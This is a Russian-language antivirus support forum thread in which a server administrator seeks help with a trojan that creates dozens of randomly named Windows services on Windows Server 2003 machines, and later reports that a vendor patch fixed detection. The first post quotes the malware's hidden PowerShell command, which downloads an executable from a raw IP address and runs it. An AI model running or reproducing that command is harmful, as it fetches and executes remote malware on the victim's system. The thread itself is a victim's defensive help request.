AleckK 0 Опубликовано 13 марта, 2019 Share Опубликовано 13 марта, 2019 Есть ли информация по трояну? Не могу отследить откуда он срабатывает и какой механизм использует. В интернете никакой информации. Пока замечено только на Windows 2003. Kaspersky Security 10.1 для Windows Server ничего не видит и не отлавливает. В службах создаются со случайным наборов букв несколько десятков служб типа ABvYIW ..... zzCyfQ. В службе - выполнение скрипта powershell, в 2003 конечно же он не срабатывает из-за отсутствия powershell. cmd /c powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX (New-Object Net.WebClient).DownloadFile('http://91.211.88.100/nw.exe,C:\Users\Public\nw.exe');Start-ProcessC:\Users\Public\nw.exe Хотел сам скачать этот файл и его проверить антивирусом, но сайт не отвечает, файл недоступен. Понимаю, что в будущем ничто не мешает этому файлу появиться. Цитата Ссылка на сообщение Поделиться на другие сайты
kmscom 2 286 Опубликовано 13 марта, 2019 Share Опубликовано 13 марта, 2019 внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи». https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url] Цитата Ссылка на сообщение Поделиться на другие сайты
AleckK 0 Опубликовано 13 марта, 2019 Автор Share Опубликовано 13 марта, 2019 Спасибо. Начал выполнять по инструкции и сразу обнаружил в памяти троян, который все это создает. Нашел описание по этому трояну, что необходимо обновить версии продуктов до самых последних (у меня предпоследнии версии). Проблема решена. Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 13 марта, 2019 Share Опубликовано 13 марта, 2019 @AleckK, сделайте и всё остальное, чтобы убедиться что до конца удалился. Могли остаться куски от этого трояна Цитата Ссылка на сообщение Поделиться на другие сайты
AleckK 0 Опубликовано 21 марта, 2019 Автор Share Опубликовано 21 марта, 2019 (изменено) Windows Security 10.0 и 10.1.1 for Windows Server не обнаруживают вирус. Не предотвращает заражение и не видит его даже при запуске вручную сканирования памяти. KVRT находит trojan.multi.genautorunreg.c и удаляет его, но через некоторое время сервер опять заражается. Автоматический сбор логов пока не могу сделать, он пишет, что будет перезагрузка. Изменено 21 марта, 2019 пользователем AleckK Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 21 марта, 2019 Share Опубликовано 21 марта, 2019 Для 64-битной версии системы перезагрузки не будет. Цитата Ссылка на сообщение Поделиться на другие сайты
AleckK 0 Опубликовано 21 марта, 2019 Автор Share Опубликовано 21 марта, 2019 32-битная Windows Server 2003. 3 сервера под 2003 и 1 сервер под 2008 R2 - не защищает касперский. Цитата Ссылка на сообщение Поделиться на другие сайты
AleckK 0 Опубликовано 21 марта, 2019 Автор Share Опубликовано 21 марта, 2019 (изменено) Смешно конечно, но это сервера, на них работают удаленно. Даже с ключем mstsc /admin скрипт не запускается. Запустить чиста с консоли на этих серверах невозможно, они за сотни километров, местного админа там нет. Буду писать официальный запрос в техподдержку. Пусть решают. Это смешно уже. Бесплатная утилита видит вирус, а антивирус, специально созданный для сервера не видит! Отлично мы покупаем ПО. Изменено 21 марта, 2019 пользователем AleckK Цитата Ссылка на сообщение Поделиться на другие сайты
Дмитрий Петренко 0 Опубликовано 3 апреля, 2019 Share Опубликовано 3 апреля, 2019 (изменено) Сообщение от модератора kmscom нарушение «Общие правила раздела "Уничтожение вирусов"». Изменено 4 апреля, 2019 пользователем kmscom Цитата Ссылка на сообщение Поделиться на другие сайты
AleckK 0 Опубликовано 3 апреля, 2019 Автор Share Опубликовано 3 апреля, 2019 (изменено) Да. Выслали патч, который, я так понимаю, еще не вышел в официальное обновление. С этим патчем антивирус видит трояна и лечит. critical_fix_core_3(14909).zip [16.67 MB] Изменено 3 апреля, 2019 пользователем AleckK 1 Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.